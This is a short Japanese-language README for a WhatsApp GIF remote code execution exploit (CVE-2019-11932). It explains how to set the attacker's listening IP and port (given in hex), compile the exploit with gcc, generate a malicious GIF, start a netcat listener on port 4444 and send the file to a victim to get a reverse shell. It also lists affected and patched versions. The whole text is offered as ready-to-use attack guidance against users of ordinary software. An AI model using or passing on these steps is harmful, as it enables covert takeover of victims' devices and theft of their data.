
CVE-2019-11932のエクスプロイト。WhatsApp GIFリモートコード実行脆弱性です。コンパイルして実行するとエクスプロイトが発動し、リバースシェルを取得します。
exploit.cファイル内の待受アドレス(攻撃者のもの)と待受ポートを変更してください。
次の16進コード:
3139 322e 3136
382e 322e 3732 2034 3434 3420
コードをコンパイルします:
gcc -o exploit egif_lib.c exploit.c
コンパイルされたファイルを実行します:./exploit exploit.gif
出力をgifにコピーします
netcatリスナーを起動します:
nc -lvp 4444
被害者に送信してください!
影響を受けるバージョン: 2.19.230 以下
公式にはバージョン 2.19.244 でパッチ適用済み
ソース:https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
LinkedIn: https://www.linkedin.com/in/thomas-lounis-749456175/